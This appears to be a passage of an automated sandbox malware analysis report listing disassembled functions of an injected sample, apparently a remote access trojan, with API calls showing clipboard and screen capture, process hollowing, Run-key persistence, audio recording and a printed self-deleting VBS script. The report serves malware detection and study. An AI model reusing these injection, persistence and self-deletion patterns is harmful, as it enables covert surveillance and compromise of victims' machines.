                                        • API String ID: 1703294689-0
                                        • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                        • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                        • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                        • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                        APIs
                                        • OpenClipboard.USER32(00000000), ref: 0040B711
                                        • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                        • CloseClipboard.USER32 ref: 0040B725
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Clipboard$CloseDataOpen
                                        • String ID:
                                        • API String ID: 2058664381-0
                                        • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                        • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                        • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                        • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: .
                                        • API String ID: 0-248832578
                                        • Opcode ID: 467a2b870f27eeaba5f3d85303d6c443c91537f9433fd9512f86f3d9895b4a39
                                        • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                                        • Opcode Fuzzy Hash: 467a2b870f27eeaba5f3d85303d6c443c91537f9433fd9512f86f3d9895b4a39
                                        • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                                        APIs
                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                        • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                        • String ID: lJD
                                        • API String ID: 1084509184-3316369744
                                        • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                        • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                        • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                        • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                        APIs
                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                        • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                        • String ID: lJD
                                        • API String ID: 1084509184-3316369744
                                        • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                        • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                        • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                        • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: GetLocaleInfoEx
                                        • API String ID: 2299586839-2904428671
                                        • Opcode ID: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                        • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                        • Opcode Fuzzy Hash: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                        • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$FreeProcess
                                        • String ID:
                                        • API String ID: 3859560861-0
                                        • Opcode ID: f8b7229bde56183a56125516245bdcff620dba8344b2748e8b36a977d3a4176b
                                        • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                                        • Opcode Fuzzy Hash: f8b7229bde56183a56125516245bdcff620dba8344b2748e8b36a977d3a4176b
                                        • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FeaturePresentProcessor
                                        • String ID:
                                        • API String ID: 2325560087-0
                                        • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                        • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                        • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                        • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                        APIs
                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                        • String ID:
                                        • API String ID: 1663032902-0
                                        • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                        • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                        • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                        • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                        APIs
                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$InfoLocale_abort_free
                                        • String ID:
                                        • API String ID: 2692324296-0
                                        • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                        • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                        • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                        • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                        APIs
                                          • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                        • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                        • String ID:
                                        • API String ID: 1272433827-0
                                        • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                        • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                        • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                        • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                        APIs
                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                        • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                        • String ID:
                                        • API String ID: 1084509184-0
                                        • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                        • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                        • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                        • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                        • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                        • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                        • Instruction Fuzzy Hash:
                                        APIs
                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                        • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                          • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                        • DeleteDC.GDI32(00000000), ref: 00418F2A
                                        • DeleteDC.GDI32(00000000), ref: 00418F2D
                                        • DeleteObject.GDI32(00000000), ref: 00418F30
                                        • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                        • DeleteDC.GDI32(00000000), ref: 00418F62
                                        • DeleteDC.GDI32(00000000), ref: 00418F65
                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                        • GetIconInfo.USER32(?,?), ref: 00418FBD
                                        • DeleteObject.GDI32(?), ref: 00418FEC
                                        • DeleteObject.GDI32(?), ref: 00418FF9
                                        • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                        • DeleteDC.GDI32(?), ref: 0041917C
                                        • DeleteDC.GDI32(00000000), ref: 0041917F
                                        • DeleteObject.GDI32(00000000), ref: 00419182
                                        • GlobalFree.KERNEL32(?), ref: 0041918D
                                        • DeleteObject.GDI32(00000000), ref: 00419241
                                        • GlobalFree.KERNEL32(?), ref: 00419248
                                        • DeleteDC.GDI32(?), ref: 00419258
                                        • DeleteDC.GDI32(00000000), ref: 00419263
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                        • String ID: DISPLAY
                                        • API String ID: 479521175-865373369
                                        • Opcode ID: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                                        • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                        • Opcode Fuzzy Hash: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                                        • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                        APIs
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                        • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                        • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                        • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                        • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                        • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                        • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                        • ResumeThread.KERNEL32(?), ref: 00418435
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                        • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                        • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                        • GetLastError.KERNEL32 ref: 0041847A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                        • API String ID: 4188446516-108836778
                                        • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                        • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                        • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                        • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                        APIs
                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                          • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                          • Part of subcall function 0041C3F1: CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                        • ExitProcess.KERNEL32 ref: 0040D7D0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                        • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                        • API String ID: 1861856835-332907002
                                        • Opcode ID: f7d322809b914f19b846363ddb38753919320f4f9bcc977e84cbdb017e4fa96d
                                        • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                        • Opcode Fuzzy Hash: f7d322809b914f19b846363ddb38753919320f4f9bcc977e84cbdb017e4fa96d
                                        • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                        APIs
                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                          • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                        • ExitProcess.KERNEL32 ref: 0040D419
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                        • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                        • API String ID: 3797177996-2557013105
                                        • Opcode ID: c3842cba8d0c14501c44a6e52c89837f2edaa2b41ff56417f6b5a357710c655d
                                        • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                        • Opcode Fuzzy Hash: c3842cba8d0c14501c44a6e52c89837f2edaa2b41ff56417f6b5a357710c655d
                                        • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                        APIs
                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                        • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                        • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                        • GetCurrentProcessId.KERNEL32 ref: 00412541
                                        • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                        • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                        • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                          • Part of subcall function 0041C3F1: CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                        • Sleep.KERNEL32(000001F4), ref: 00412682
                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                        • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                        • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                        • String ID: .exe$8SG$WDH$exepath$open$temp_
                                        • API String ID: 2649220323-436679193
                                        • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                        • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                        • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                        • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                        APIs
                                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
